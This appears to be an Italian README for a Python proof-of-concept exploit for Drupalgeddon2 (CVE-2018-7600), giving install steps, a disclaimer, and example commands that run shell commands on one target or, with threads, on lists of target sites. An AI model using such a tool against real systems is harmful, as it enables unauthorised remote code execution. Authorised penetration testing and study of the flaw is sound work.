
Questo repository contiene un Proof-of-Concept (PoC) completamente originale e sviluppato in proprio per CVE-2018-7600, noto anche come Drupalgeddon 2 — una vulnerabilità critica di esecuzione remota di codice che interessa le versioni core di Drupal 7 e 8.
Questo repository contiene un exploit proof-of-concept basato su Python per la vulnerabilità critica di esecuzione remota di codice in Drupal, nota come Drupalgeddon2 (CVE-2018-7600). Questo script è pensato per scopi didattici e per l'uso da parte di professionisti della sicurezza in scenari di penetration testing autorizzati.
Questo strumento è destinato esclusivamente a scopi legali ed etici. Utilizzare questo script su qualsiasi sistema senza l'esplicita autorizzazione del proprietario è illegale. L'autore e i collaboratori non sono responsabili di eventuali usi impropri o danni causati da questo script. Usalo a tuo rischio e pericolo.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
Lo script offre diversi argomenti da riga di comando per personalizzarne l'esecuzione.
Sfrutta un singolo target con il comando predefinito (whoami):
python3 drupalgeddon2.py -t http://example.com
Sfrutta un singolo target con un comando personalizzato (ad es., ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Scansiona un elenco di target da un file:
Crea un file chiamato targets.txt con un URL per riga:
http://site1.com
https://site2.org
http://site3.net
Poi esegui lo script:
python3 drupalgeddon2.py -l targets.txt
Scansiona un elenco con un comando personalizzato e più thread:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Salva l'output in un file di log:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argomento | Opzione breve | Descrizione | Predefinito |
|---|
--target | -t | Un singolo URL target. | - |
--list | -l | Percorso di un file contenente un elenco di URL target. | - |
--command | -c | Il comando da eseguire sul target. | whoami |
--threads | -T | Numero di thread concorrenti da utilizzare. | 5 |
--output | -o | File in cui salvare l'output. | - |
--timeout | Timeout della richiesta in secondi. | 15 |